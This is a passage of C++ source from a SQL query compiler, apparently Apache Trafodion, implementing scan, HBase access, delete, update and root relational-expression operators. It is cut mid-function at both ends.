&xlist, LIST(NAString) &llist) const { RelExpr::addLocalExpr(xlist,llist); } NABoolean Scan::reconcileGroupAttr(GroupAttributes *newGroupAttr) { addIndexInfo(); const SET(IndexDesc *) & indexOnlyScans = deriveIndexOnlyIndexDesc(); const SET(IndexDesc *) & indexJoinScans = deriveIndexJoinIndexDesc(); // we add the available indexes on this scan node to the // new GroupAttrs availableBtreeIndexes newGroupAttr->addToAvailableBtreeIndexes(indexOnlyScans); newGroupAttr->addToAvailableBtreeIndexes(indexJoinScans); // This one is not actually necessary getGroupAttr()->addToAvailableBtreeIndexes(indexOnlyScans); getGroupAttr()->addToAvailableBtreeIndexes(indexJoinScans); // Now as usual return RelExpr::reconcileGroupAttr(newGroupAttr); } // -------------------------------------------------------------------- // 10-040128-2749 -begin // This will compute based on the context,Current Control table setting // and defaults. // Input : Context // -------------------------------------------------------------------- NABoolean Scan::isMdamEnabled(const Context *context) { NABoolean mdamIsEnabled = TRUE; // ----------------------------------------------------------------------- // Check the status of the enabled/disabled flag in // the defaults: // ----------------------------------------------------------------------- if (CmpCommon::getDefault(MDAM_SCAN_METHOD) == DF_OFF) mdamIsEnabled = FALSE; // ----------------------------------------------------------------------- // Mdam can also be disabled for a particular scan via Control // Query Shape. The information is passed by the context. // ----------------------------------------------------------------------- if (mdamIsEnabled) { const ReqdPhysicalProperty* propertyPtr = context->getReqdPhysicalProperty(); if ( propertyPtr && propertyPtr->getMustMatch() && (propertyPtr->getMustMatch()->getOperatorType() == REL_FORCE_ANY_SCAN)) { ScanForceWildCard* scanForcePtr = (ScanForceWildCard*)propertyPtr->getMustMatch(); if (scanForcePtr->getMdamStatus() == ScanForceWildCard::MDAM_OFF) mdamIsEnabled = FALSE; } } // ----------------------------------------------------------------------- // Mdam can also be disabled for a particular table via a Control // Table command. // ----------------------------------------------------------------------- if (mdamIsEnabled) { const NAString * val = ActiveControlDB()->getControlTableValue(getTableName().getUgivenName(), "MDAM"); if ((val) && (*val == "OFF")) // CT in effect { mdamIsEnabled = FALSE; } } return mdamIsEnabled; } // 10-040128-2749 -end // ----------------------------------------------------------------------- // methods for class ScanIndexInfo // ----------------------------------------------------------------------- ScanIndexInfo::ScanIndexInfo(const ScanIndexInfo & other) : outputsFromIndex_ (other.outputsFromIndex_), indexPredicates_ (other.indexPredicates_), joinPredicates_ (other.joinPredicates_), outputsFromRightScan_ (other.outputsFromRightScan_), transformationDone_ (other.transformationDone_), indexColumns_ (other.indexColumns_), usableIndexes_ (other.usableIndexes_) {} ScanIndexInfo::ScanIndexInfo( const ValueIdSet& inputsToIndex, const ValueIdSet& outputsFromIndex, const ValueIdSet& indexPredicates, const ValueIdSet& joinPredicates, const ValueIdSet& outputsFromRightScan, const ValueIdSet& indexColumns, IndexProperty* ixProp ) : inputsToIndex_(inputsToIndex), outputsFromIndex_(outputsFromIndex), indexPredicates_(indexPredicates), joinPredicates_(joinPredicates), outputsFromRightScan_(outputsFromRightScan), indexColumns_(indexColumns), transformationDone_(FALSE), usableIndexes_(CmpCommon::statementHeap()) { usableIndexes_.insert(ixProp); } // ----------------------------------------------------------------------- // methods for class FileScan // ----------------------------------------------------------------------- FileScan::FileScan(const CorrName& tableName, TableDesc * tableDescPtr, const IndexDesc *indexDescPtr, const NABoolean isReverseScan, const Cardinality& baseCardinality, StmtLevelAccessOptions& accessOpts, GroupAttributes * groupAttributesPtr, const ValueIdSet& selectionPredicates, const Disjuncts& disjuncts, const ValueIdSet& generatedCCPreds, OperatorTypeEnum otype) : Scan (tableName, tableDescPtr, otype), indexDesc_(indexDescPtr), reverseScan_(isReverseScan), executorPredTree_(NULL), mdamKeyPtr_(NULL), disjunctsPtr_(&disjuncts), pathKeys_(NULL), partKeys_(NULL), hiveSearchKey_(NULL), estRowsAccessed_ (0), mdamFlag_(UNDECIDED), skipRowsToPreventHalloween_(FALSE), doUseSearchKey_(TRUE), computedNumOfActivePartitions_(-1) { // Set the filescan properties: // Set the base cardinality to that for the logical scan setBaseCardinality(baseCardinality); // move the statement level access options accessOptions() = accessOpts; // the top node keeps the original group attributes setGroupAttr(groupAttributesPtr); // Initialize selection predicates: // (they are needed to set the executor predicates later in // pre-code gen) selectionPred().insert(selectionPredicates); // Get the predicates on the partitioning key: if (getIndexDesc() && getIndexDesc()->isPartitioned()) { ValueIdSet externalInputs = getGroupAttr()->getCharacteristicInputs(); ValueIdSet dummySet; ValueIdSet selPreds(selectionPredicates); // Create and set the Searchkey for the partitioning key: partKeys_ = new (CmpCommon::statementHeap()) SearchKey(indexDesc_->getPartitioningKey(), indexDesc_->getOrderOfPartitioningKeyValues(), externalInputs, NOT getReverseScan(), selPreds, disjuncts, dummySet, // needed by interface but not used here indexDesc_ ); if ( indexDesc_->getPartitioningFunction() && indexDesc_->getPartitioningFunction()->castToRangePartitioningFunction() ) { const RangePartitioningFunction* rangePartFunc = indexDesc_->getPartitioningFunction()->castToRangePartitioningFunction(); computedNumOfActivePartitions_ = rangePartFunc->computeNumOfActivePartitions(partKeys_, tableDescPtr); } } setComputedPredicates(generatedCCPreds); } // FileScan() void FileScan::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // // Assign the set of columns that belong to the index to be scanned // as the output values that can be produced by this scan. // outputValues.insertList( getIndexDesc()->getIndexColumns() ); // MV -- // Add the CurrentEpoch column as well. outputValues.insert(getExtraOutputColumns()); } // FileScan::getPotentialOutputValues() NABoolean FileScan::patternMatch(const RelExpr & other) const { // handle the special case of a pattern to force a // specific table or index if (other.getOperatorType() == REL_FORCE_ANY_SCAN) { ScanForceWildCard &w = (ScanForceWildCard &) other; if (w.getExposedName() != "") { QualifiedName wName(w.getExposedName(), 1 /* minimal 1 part name */); if (getTableName().getCorrNameAsString() != "") { // query uses a correlation name, compare that with the wildcard // as a string if (wName.getQualifiedNameAsAnsiString() != ToAnsiIdentifier(getTableName().getCorrNameAsString())) return FALSE; } else { // no correlation name used in the query, compare catalog, schema // and table parts separately, if they exist in the wildcard const NAString& catName = wName.getCatalogName(); const NAString& schName = wName.getSchemaName(); const QualifiedName& x = getTableName(). getExtendedQualNameObj().getQualifiedNameObj(); if ((catName.length() > 0 && x.getCatalogName() != catName) || (schName.length() > 0 && x.getSchemaName() != schName) || x.getObjectName() != wName.getObjectName()) return FALSE; } } // if an index name was specified in the wildcard, check for it if (w.getIndexName() != "") { NAString forcedIndexName(w.getIndexName(), CmpCommon::statementHeap()); // The user can specify the index to be the base table in the // Control Query Shape statement by using the table name (object // name or correlation) as the index name. Ex: scan('t1','t1',..) // since t1 might be a correlation name, its necessary to check // for the corresponding object name and not the table correlation // name when searching for the index match. if (forcedIndexName == w.getExposedName()) forcedIndexName = ToAnsiIdentifier( getTableName().getQualifiedNameObj().getObjectName() ); // get the three-part name of the index const NAString &ixName = indexDesc_->getNAFileSet()->getExtFileSetName(); // Declare a match if either the index name in w is equal to // indexName or if it is equal to the last part of indexName. //if (w.getIndexName() != ixName) if (forcedIndexName != ixName) { QualifiedName ixNameQ(ixName, 1); if ( ToAnsiIdentifier(ixNameQ.getObjectName()) != forcedIndexName ) return FALSE; } } return TRUE; } else return RelExpr::patternMatch(other); } NABoolean FileScan::duplicateMatch(const RelExpr & other) const { if (!Scan::duplicateMatch(other)) return FALSE; FileScan &o = (FileScan &) other; if (//beginKeyPred_ != o.beginKeyPred_ OR //endKeyPred_ != o.endKeyPred_ OR retrievedCols_ != o.retrievedCols_ OR getExecutorPredicates() != o.getExecutorPredicates()) return FALSE; return TRUE; } RelExpr * FileScan::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { // $$$ Function needs to be updated with new fields // added to the filescan. // If you need to use this function please update it // with those new fields (i.e. SearchKey *, etc's) // then remove the following abort // CMPABORT; FileScan *result; if (derivedNode == NULL) result = new(outHeap) FileScan(getTableName(), getTableDesc(), getIndexDesc(), REL_FILE_SCAN, outHeap); else result = (FileScan *) derivedNode; result->setBaseCardinality(getBaseCardinality()); result->setEstRowsAccessed(getEstRowsAccessed()); result->beginKeyPred_ = beginKeyPred_; result->endKeyPred_ = endKeyPred_; result->setExecutorPredicates(getExecutorPredicates()); result->retrievedCols_ = retrievedCols_; return Scan::copyTopNode(result, outHeap); } NABoolean FileScan::isLogical() const { return FALSE; } NABoolean FileScan::isPhysical() const { return TRUE; } PlanPriority FileScan::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; // --------------------------------------------------------------------- // If under interactive_access mode, then give preference to plans that // avoid full table scans // Similarly if under firstN optimization mode then give preference to // plans that avoid full table scans // --------------------------------------------------------------------- NABoolean interactiveAccess = (CmpCommon::getDefault(INTERACTIVE_ACCESS) == DF_ON) OR ( QueryAnalysis::Instance() AND QueryAnalysis::Instance()->optimizeForFirstNRows()); int indexPriorityDelta = getIndexDesc()->indexHintPriorityDelta(); if (interactiveAccess) { if(getMdamKeyPtr()) { // We have MDAM. Give this a preference result.incrementLevels(INTERACTIVE_ACCESS_MDAM_PRIORITY,0); } else if(getSearchKeyPtr() AND getSearchKeyPtr()->getKeyPredicates().entries()) { // We have direct index access. Give this a preference result.incrementLevels(INTERACTIVE_ACCESS_PRIORITY,0); } } if (indexPriorityDelta && !areHintsSuppressed()) // yes, the index is one of the indexes listed in the hint result.incrementLevels(indexPriorityDelta, 0); return result; } // currently only used by MV query rewrite PlanPriority PhysicalMapValueIds::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; // is this MVI wraps one of the favorite MVs // (included in the MVQR_REWRITE_CANDIDATES default) if (includesFavoriteMV()) { result.incrementLevels(MVQR_FAVORITE_PRIORITY,0); } return result; } const NAString FileScan::getText() const { // --------------------------------------------------------------------- // returns: // // file scan t c for a primary index scan on table // t with correlation name c // index scan ix(t c) for an index scan on index ix of // table t // rev. index scan ix(t c) if the scan goes backwards // --------------------------------------------------------------------- NAString op(CmpCommon::statementHeap()); NAString tname(getTableName().getText(),CmpCommon::statementHeap()); if (isSampleScan() == TRUE) op = "sample_"; if (indexDesc_ == NULL OR indexDesc_->isClusteringIndex()) { if (isHiveTable()) op += "hive_scan "; else op += "file_scan "; } else { op += "index_scan "; tname = indexDesc_->getIndexName().getQualifiedNameAsString() + "(" + tname + ")"; } if (reverseScan_) op += NAString("rev "); return op + tname; } const NAString FileScan::getTypeText() const { NAString descr(CmpCommon::statementHeap()); NAString tname(getTableName().getText(),CmpCommon::statementHeap()); if (isSampleScan() == TRUE) descr = "sample "; if (reverseScan_) descr += NAString("reverse "); if (isFullScanPresent() && !getMdamKeyPtr()) { descr += "full scan "; if (getMdamKeyPtr()) descr += "limited by mdam "; } else { descr += "subset scan "; if (getMdamKeyPtr()) descr += "limited by mdam "; } descr += "of "; if (indexDesc_ == NULL OR indexDesc_->isClusteringIndex()) descr += "table "; else { descr += "index "; tname = indexDesc_->getIndexName().getQualifiedNameAsString() + "(" + tname + ")"; } descr += tname; return descr; } void FileScan::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (getIndexDesc() != NULL) { const ValueIdList& keyColumns = getIndexDesc()->getIndexKey(); xlist.insert(keyColumns.rebuildExprTree()); llist.insert("key_columns"); } if (executorPredTree_ != NULL OR NOT getExecutorPredicates().isEmpty()) { if (getExecutorPredicates().isEmpty()) xlist.insert(executorPredTree_); else xlist.insert(getExecutorPredicates().rebuildExprTree()); llist.insert("executor_predicates"); } // ----------------------------------------------------------------------- // Display key information // ----------------------------------------------------------------------- if (getMdamKeyPtr() != NULL) { // Mdam access! const CollIndex columns = getIndexDesc()->getIndexKey().entries(); const CollIndex disjEntries = getMdamKeyPtr()->getKeyDisjunctEntries(); // If we are in the optimizer, obtain key preds from // the disjuncts, // else obtain them from the column order list array: if (NOT nodeIsPreCodeGenned()) { // We are in the optimizer... // For every disjunct for (CollIndex i=0; i < disjEntries; i++) { ColumnOrderList kpbc(getIndexDesc()->getIndexKey()); getMdamKeyPtr()->getKeyPredicatesByColumn(kpbc,i); // gather the key predicates: ValueIdSet keyPreds; for (CollIndex j=0; j < columns; j++) { if (kpbc[j]) { keyPreds.insert(*(kpbc[j])); } } // display this disjunct key preds. into the GUI: xlist.insert(keyPreds.rebuildExprTree()); llist.insert("mdam_disjunct"); } // for every disjunct } else { // we are after the generator... const ColumnOrderListPtrArray &columnOrderListPtrArray = getMdamKeyPtr()->getColumnOrderListPtrArray(); // we are in the generator, obtain the key preds // from thr column order list: ValueIdSet *predsPtr = NULL; for (CollIndex n = 0; n < columnOrderListPtrArray.entries(); n++) { // get the list of key predicates associated with the n disjunct: const ColumnOrderList &columnOrderList = *columnOrderListPtrArray[n]; // get predicates for column order i: // gather the key predicates: ValueIdSet keyPreds; const ValueIdSet *predsPtr = NULL; for (CollIndex i = 0; i < columnOrderList.entries(); i++) { predsPtr = columnOrderList[i]; if (predsPtr) { keyPreds.insert(*predsPtr); } } // display this disjunct key preds. into the GUI: xlist.insert(keyPreds.rebuildExprTree()); llist.insert("mdam_disjunct"); } } // mdam after the generator } // mdam access else if (getSearchKeyPtr() != NULL) // Is Single subset access? { // yes! // display preds from search key only if begin/end keys are // not generated yet (e.g. during optimization) if (getBeginKeyPred().isEmpty() AND getEndKeyPred().isEmpty() AND pathKeys_ AND NOT pathKeys_->getKeyPredicates().isEmpty()) { xlist.insert(pathKeys_->getKeyPredicates().rebuildExprTree()); if (pathKeys_ == partKeys_) llist.insert("key_and_part_key_preds"); else llist.insert("key_predicates"); } } // display part key preds only if different from clustering key preds if (partKeys_ AND pathKeys_ != partKeys_ AND NOT partKeys_->getKeyPredicates().isEmpty()) { xlist.insert(partKeys_->getKeyPredicates().rebuildExprTree()); llist.insert("part_key_predicates"); } if (NOT getBeginKeyPred().isEmpty()) { xlist.insert(getBeginKeyPred().rebuildExprTree()); llist.insert("begin_key"); } if (NOT getEndKeyPred().isEmpty()) { xlist.insert(getEndKeyPred().rebuildExprTree()); llist.insert("end_key"); } // xlist.insert(retrievedCols_.rebuildExprTree(ITM_ITEM_LIST)); // llist.insert("retrieved_cols"); RelExpr::addLocalExpr(xlist,llist); } const Disjuncts& FileScan::getDisjuncts() const { CMPASSERT(disjunctsPtr_ != NULL); return *disjunctsPtr_; } // ----------------------------------------------------------------------- // methods for class HbaseAccess // ----------------------------------------------------------------------- HbaseAccess::HbaseAccess(CorrName &corrName, OperatorTypeEnum otype, CollHeap *oHeap) : FileScan(corrName, NULL, NULL, otype, oHeap), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } HbaseAccess::HbaseAccess(CorrName &corrName, TableDesc *tableDesc, IndexDesc *idx, const NABoolean isReverseScan, const Cardinality& baseCardinality, StmtLevelAccessOptions& accessOptions, GroupAttributes * groupAttributesPtr, const ValueIdSet& selectionPredicates, const Disjuncts& disjuncts, const ValueIdSet& generatedCCPreds, OperatorTypeEnum otype, CollHeap *oHeap) : FileScan(corrName, tableDesc, idx, isReverseScan, baseCardinality, accessOptions, groupAttributesPtr, selectionPredicates, disjuncts, generatedCCPreds, otype), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; //setTableDesc(tableDesc); uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } HbaseAccess::HbaseAccess(CorrName &corrName, NABoolean isRW, NABoolean isCW, CollHeap *oHeap) : FileScan(corrName, NULL, NULL, REL_HBASE_ACCESS, oHeap), isRW_(isRW), isCW_(isCW), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } HbaseAccess::HbaseAccess( OperatorTypeEnum otype, CollHeap *oHeap) : FileScan(CorrName(), NULL, NULL, otype, oHeap), listOfSearchKeys_(oHeap), snpType_(SNP_NONE), retHbaseColRefSet_(oHeap), opList_(oHeap) { accessType_ = SELECT_; uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } //! HbaseAccess::~HbaseAccess Destructor HbaseAccess::~HbaseAccess() { } //! HbaseAccess::copyTopNode method RelExpr * HbaseAccess::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseAccess *result; if (derivedNode == NULL) result = new (outHeap) HbaseAccess(REL_HBASE_ACCESS, outHeap); else result = (HbaseAccess *) derivedNode; //result->corrName_ = corrName_; result->accessType_ = accessType_; result->isRW_ = isRW_; result->isCW_ = isCW_; result->setTableDesc(getTableDesc()); result->setIndexDesc(getIndexDesc()); //result->setTableDesc(getTableDesc()); result->listOfSearchKeys_ = listOfSearchKeys_; result->retColRefSet_ = retColRefSet_; result->uniqueHbaseOper_ = uniqueHbaseOper_; result->uniqueRowsetHbaseOper_ = uniqueRowsetHbaseOper_; return Scan::copyTopNode(result, outHeap); // return BuiltinTableValuedFunction::copyTopNode(result, outHeap); } const NAString HbaseAccess::getText() const { NAString op(CmpCommon::statementHeap()); NAString tname(getTableName().getText(),CmpCommon::statementHeap()); NAString sampleOpt(CmpCommon::statementHeap()); if (isSampleScan()) sampleOpt = "sample_"; if (getIndexDesc() == NULL OR getIndexDesc()->isClusteringIndex()) { if (isSeabaseTable()) { if (uniqueRowsetHbaseOper()) (op += "trafodion_vsbb_") += sampleOpt += "scan "; else (op += "trafodion_") += sampleOpt += "scan "; } else (op += "hbase_") += sampleOpt += "scan "; } else { if (isSeabaseTable()) (op += "trafodion_index_") += sampleOpt += "scan "; else (op += "hbase_index_") += sampleOpt += "scan "; tname = getIndexDesc()->getIndexName().getQualifiedNameAsString() + "(" + tname + ")"; } if (getReverseScan()) op += NAString("rev "); return op + tname; } RelExpr *HbaseAccess::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // CorrName &corrName = (CorrName&)getCorrName(); CorrName &corrName = getTableName(); NATable * naTable = NULL; naTable = bindWA->getSchemaDB()->getNATableDB()-> get(&corrName.getExtendedQualNameObj()); if ( !naTable || bindWA->errStatus()) { *CmpCommon::diags() << DgSqlCode(-1388) << DgTableName(corrName.getExposedNameAsAnsiString()); bindWA->setErrStatus(); return this; } // Allocate a TableDesc and attach it to this. // TableDesc * td = bindWA->createTableDesc(naTable, corrName); if (! td || bindWA->errStatus()) return this; setTableDesc(td); setIndexDesc(td->getClusteringIndex()); if (bindWA->errStatus()) return this; RelExpr * re = NULL; // re = BuiltinTableValuedFunction::bindNode(bindWA); re = Scan::bindNode(bindWA); if (bindWA->errStatus()) return this; return re; } void HbaseAccess::getPotentialOutputValues( ValueIdSet & outputValues) const { outputValues.clear(); // since this is a physical operator, it only generates the index columns outputValues.insertList( getIndexDesc()->getIndexColumns() ); outputValues.insertList( getTableDesc()->hbaseTSList() ); outputValues.insertList( getTableDesc()->hbaseVersionList() ); } // HbaseAccess::getPotentialOutputValues() void HbaseAccess::synthEstLogProp(const EstLogPropSharedPtr& inputEstLogProp) { if (getGroupAttr()->isPropSynthesized(inputEstLogProp)) return; // Create a new Output Log Property with cardinality of 10 for now. EstLogPropSharedPtr myEstProps(new (HISTHEAP) EstLogProp(10)); getGroupAttr()->addInputOutputLogProp(inputEstLogProp, myEstProps); } // HbaseAccess::synthEstLogProp void HbaseAccess::synthLogProp(NormWA * normWAPtr) { // Check to see whether this GA has already been associated // with a logExpr for synthesis. If so, no need to resynthesize // for this equivalent log. expression. if (getGroupAttr()->existsLogExprForSynthesis()) return; RelExpr::synthLogProp(normWAPtr); } // HbaseAccess::synthLogProp() // ----------------------------------------------------------------------- // methods for class HBaseAccessCoProcAggr // ----------------------------------------------------------------------- HbaseAccessCoProcAggr::HbaseAccessCoProcAggr(CorrName &corrName, ValueIdSet &aggregateExpr, TableDesc *tableDesc, IndexDesc *idx, const NABoolean isReverseScan, const Cardinality& baseCardinality, StmtLevelAccessOptions& accessOptions, GroupAttributes * groupAttributesPtr, const ValueIdSet& selectionPredicates, const Disjuncts& disjuncts, CollHeap *oHeap) : HbaseAccess(corrName, tableDesc, idx, isReverseScan, baseCardinality, accessOptions, groupAttributesPtr, selectionPredicates, disjuncts, ValueIdSet(), REL_HBASE_COPROC_AGGR), aggregateExpr_(aggregateExpr) { accessType_ = COPROC_AGGR_; } HbaseAccessCoProcAggr::HbaseAccessCoProcAggr(CorrName &corrName, ValueIdSet &aggregateExpr, CollHeap *oHeap) : HbaseAccess(corrName, REL_HBASE_COPROC_AGGR, oHeap), aggregateExpr_(aggregateExpr) { accessType_ = COPROC_AGGR_; } HbaseAccessCoProcAggr::HbaseAccessCoProcAggr( CollHeap *oHeap) : HbaseAccess(REL_HBASE_COPROC_AGGR, oHeap) { accessType_ = SELECT_; uniqueHbaseOper_ = FALSE; uniqueRowsetHbaseOper_ = FALSE; } //! HbaseAccessCoProcAggr::~HbaseAccessCoProcAggr Destructor HbaseAccessCoProcAggr::~HbaseAccessCoProcAggr() { } //! HbaseAccessCoProcAggr::copyTopNode method RelExpr * HbaseAccessCoProcAggr::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseAccessCoProcAggr *result; if (derivedNode == NULL) result = new (outHeap) HbaseAccessCoProcAggr(outHeap); else result = (HbaseAccessCoProcAggr *) derivedNode; result->aggregateExpr_ = aggregateExpr_; return HbaseAccess::copyTopNode(result, outHeap); } const NAString HbaseAccessCoProcAggr::getText() const { NAString op(CmpCommon::statementHeap()); NAString tname(getTableName().getText(),CmpCommon::statementHeap()); op += "hbase_coproc_aggr "; return op + tname; } RelExpr *HbaseAccessCoProcAggr::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } RelExpr * re = NULL; re = HbaseAccess::bindNode(bindWA); if (bindWA->errStatus()) return this; return re; } void HbaseAccessCoProcAggr::getPotentialOutputValues( ValueIdSet & outputValues) const { outputValues.clear(); outputValues += aggregateExpr(); } // HbaseAccessCoProcAggr::getPotentialOutputValues() PhysicalProperty* HbaseAccessCoProcAggr::synthPhysicalProperty(const Context* myContext, const Lng32 planNumber, PlanWorkSpace *pws) { //---------------------------------------------------------- // Create a node map with a single, active, wild-card entry. //---------------------------------------------------------- NodeMap* myNodeMap = new(CmpCommon::statementHeap()) NodeMap(CmpCommon::statementHeap(), 1, NodeMapEntry::ACTIVE); //------------------------------------------------------------ // Synthesize a partitioning function with a single partition. //------------------------------------------------------------ PartitioningFunction* myPartFunc = new(CmpCommon::statementHeap()) SinglePartitionPartitioningFunction(myNodeMap); PhysicalProperty * sppForMe = new(CmpCommon::statementHeap()) PhysicalProperty(myPartFunc, EXECUTE_IN_MASTER, SOURCE_VIRTUAL_TABLE); // remove anything that's not covered by the group attributes sppForMe->enforceCoverageByGroupAttributes (getGroupAttr()) ; return sppForMe; } // HbaseAccessCoProcAggr::synthPhysicalProperty() // ----------------------------------------------------------------------- // methods for class HbaseDelete // ----------------------------------------------------------------------- HbaseDelete::HbaseDelete(CorrName &corrName, RelExpr *scan, CollHeap *oHeap) : Delete(corrName, NULL, REL_HBASE_DELETE, scan, NULL, NULL, NULL, oHeap), corrName_(corrName), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } HbaseDelete::HbaseDelete(CorrName &corrName, TableDesc *tableDesc, CollHeap *oHeap) : Delete(corrName, tableDesc, REL_HBASE_DELETE, NULL, NULL, NULL, NULL,oHeap), corrName_(corrName), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } HbaseDelete::HbaseDelete( CollHeap *oHeap) : Delete(CorrName(""), NULL, REL_HBASE_DELETE, NULL, NULL, NULL, NULL, oHeap), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } //! HbaseDelete::~HbaseDelete Destructor HbaseDelete::~HbaseDelete() { } //! HbaseDelete::copyTopNode method RelExpr * HbaseDelete::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseDelete *result; if (derivedNode == NULL) result = new (outHeap) HbaseDelete(corrName_, getTableDesc(), outHeap); else result = (HbaseDelete *) derivedNode; result->corrName_ = corrName_; result->setTableDesc(getTableDesc()); result->listOfSearchKeys_ = listOfSearchKeys_; result->retColRefSet_ = retColRefSet_; return Delete::copyTopNode(result, outHeap); } RelExpr *HbaseDelete::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } RelExpr * re = NULL; re = Delete::bindNode(bindWA); if (bindWA->errStatus()) return this; return re; } //! HbaseDelete::getText method const NAString HbaseDelete::getText() const { NABoolean isSeabase = (getTableDesc() && getTableDesc()->getNATable() ? getTableDesc()->getNATable()->isSeabaseTable() : FALSE); NAString text; if (NOT isSeabase) text = "hbase_"; else text = "trafodion_"; if (uniqueRowsetHbaseOper()) text += "vsbb_"; text += "delete"; return text; } Int32 HbaseDelete::getArity() const { return 0; } void HbaseDelete::getPotentialOutputValues( ValueIdSet & outputValues) const { outputValues.clear(); // since this is a physical operator, it only generates the index columns if (getScanIndexDesc()) outputValues.insertList(getScanIndexDesc()->getIndexColumns()); } // HbaseDelete::getPotentialOutputValues() // ----------------------------------------------------------------------- // methods for class HbaseUpdate // ----------------------------------------------------------------------- HbaseUpdate::HbaseUpdate(CorrName &corrName, RelExpr *scan, CollHeap *oHeap) : UpdateCursor(corrName, NULL, REL_HBASE_UPDATE, scan, oHeap), corrName_(corrName), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } HbaseUpdate::HbaseUpdate(CorrName &corrName, TableDesc *tableDesc, CollHeap *oHeap) : UpdateCursor(corrName, tableDesc, REL_HBASE_UPDATE, NULL, oHeap), corrName_(corrName), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } HbaseUpdate::HbaseUpdate( CollHeap *oHeap) : UpdateCursor(CorrName(""), NULL, REL_HBASE_UPDATE, NULL, oHeap), listOfSearchKeys_(oHeap) { hbaseOper() = TRUE; } //! HbaseUpdate::~HbaseUpdate Destructor HbaseUpdate::~HbaseUpdate() { } //! HbaseUpdate::copyTopNode method RelExpr * HbaseUpdate::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { HbaseUpdate *result; if (derivedNode == NULL) result = new (outHeap) HbaseUpdate(corrName_, getTableDesc(), outHeap); else result = (HbaseUpdate *) derivedNode; result->corrName_ = corrName_; result->setTableDesc(getTableDesc()); result->listOfSearchKeys_ = listOfSearchKeys_; result->retColRefSet_ = retColRefSet_; return Update::copyTopNode(result, outHeap); } RelExpr *HbaseUpdate::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } RelExpr * re = NULL; re = Update::bindNode(bindWA); if (bindWA->errStatus()) return this; return re; } //! HbaseUpdate::getText method const NAString HbaseUpdate::getText() const { NABoolean isSeabase = (getTableDesc() ? getTableDesc()->getNATable()->isSeabaseTable() : FALSE); NAString text; if (isMerge()) { text = (isSeabase ? "trafodion_merge" : "hbase_merge"); } else { if (NOT isSeabase) text = "hbase_"; else text = "trafodion_"; if (uniqueRowsetHbaseOper()) text += "vsbb_"; text += "update"; } return text; } Int32 HbaseUpdate::getArity() const { return 0; } void HbaseUpdate::getPotentialOutputValues( ValueIdSet & outputValues) const { outputValues.clear(); // Include the index columns from the original Scan, if any if (getScanIndexDesc()) outputValues.insertList(getScanIndexDesc()->getIndexColumns()); // Include the index columns from the updated table, if any if (getIndexDesc()) outputValues.insertList (getIndexDesc()->getIndexColumns()); } // HbaseUpdate::getPotentialOutputValues() // ----------------------------------------------------------------------- // Member functions for DP2 Scan // ----------------------------------------------------------------------- DP2Scan::DP2Scan(const CorrName& tableName, TableDesc * tableDescPtr, const IndexDesc *indexDescPtr, const NABoolean isReverseScan, const Cardinality& baseCardinality, StmtLevelAccessOptions& accessOpts, GroupAttributes * groupAttributesPtr, const ValueIdSet& selectionPredicates, const Disjuncts& disjuncts) : FileScan(tableName, tableDescPtr, indexDescPtr, isReverseScan, baseCardinality, accessOpts, groupAttributesPtr, selectionPredicates, disjuncts, ValueIdSet()) { } // -------------------------------------------------- // methods for class Describe // -------------------------------------------------- void Describe::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // // Assign the set of columns that belong to the index to be scanned // as the output values that can be produced by this scan. // outputValues.insertList( getTableDesc()->getClusteringIndex()->getIndexColumns() ); } // Describe::getPotentialOutputValues() // ----------------------------------------------------------------------- // methods for class RelRoot // ----------------------------------------------------------------------- RelRoot::RelRoot(RelExpr *input, OperatorTypeEnum otype, ItemExpr *compExpr, ItemExpr *orderBy, ItemExpr *updateCol, RelExpr *reqdShape, CollHeap *oHeap) : RelExpr(otype, input, NULL, oHeap), compExprTree_(compExpr), orderByTree_(orderBy), updateColTree_(updateCol), reqdShape_(reqdShape), viewStoiList_(CmpCommon::statementHeap()), ddlStoiList_(CmpCommon::statementHeap()), stoiUdrList_(CmpCommon::statementHeap()), udfList_(CmpCommon::statementHeap()), securityKeySet_(CmpCommon::statementHeap()), trueRoot_(FALSE), subRoot_(FALSE), displayTree_(FALSE), outputVarCnt_(-1), inputVarTree_(NULL), outputVarTree_(NULL), updatableSelect_(TRUE), updateCurrentOf_(FALSE), currOfCursorName_(NULL), rollbackOnError_(FALSE), readOnlyTransIsOK_(FALSE), needFirstSortedRows_(FALSE), numSimpleVar_(0), numHostVar_(0), childOperType_(NO_OPERATOR_TYPE), hostArraysArea_(NULL), assignmentStTree_(NULL), assignList_(NULL), isRootOfInternalRefresh_(FALSE), isQueryNonCacheable_(FALSE), pMvBindContextForScope_(NULL), 